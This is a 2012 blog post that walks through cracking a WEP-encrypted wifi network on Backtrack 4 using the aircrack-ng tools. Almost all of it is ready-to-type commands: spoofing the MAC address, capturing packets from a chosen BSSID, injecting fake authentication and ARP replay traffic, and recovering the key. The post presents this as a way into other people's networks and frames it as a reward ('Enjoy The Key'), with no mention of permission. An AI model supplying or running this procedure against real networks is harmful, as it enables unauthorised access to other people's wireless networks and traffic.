Wednesday, May 30, 2012

Cracking wifi

Although this is already a common procedure and that most of the people has already implemented this, those who are still to break the wifi code, you can refer to this article.
Note: This will work only for WEP type of encryption and that you need to run a Live Persistent CD of Backtrack 4.
Here '//' is for comments and you don't need to type texts within this.

Open a shell/konsole then start to type:

airmon-ng

// then a interface of your computer is shown, for example we take eth1 //

airmon-ng stop eth1
ifconfig eth1 down
macchanger -- mac 00:11:22:33:44:55 eth1
airmon-ng start eth1
airodump-ng eth1
// here note down the BSSID number and channel number of the network you need to attack, we take BSSID no. as 00:11:95:19:40:9B and channel no. as 6//

airodump-ng -c 6 -w pokemon --bssid 00:11:95:19:40:9B eth1

// donot close this shell. open a 2nd shell and write the following://

aireplay-ng -1 0 -a 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1
aireplay-ng -3 -b 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1

// keep on the data on the 1st shell. The data should reach more than 10000. minimise the 2nd shell and continue writing following on third shell://

aircrack-ng -b 00:11:95:19:40:9B pokemon-01.cap

// The code is finished. Now when the key is cracked, it is obtained on the shell in the format: aa:bb:cc:dd:ee..... Remove the colons and thus obtain the wifi key of the network you attacked.
For the more knowledge about the scope and facts about the backlink through open sources you can refer to the following link:
backtrack


.........Enjoy The Key............... //

No comments:

Post a Comment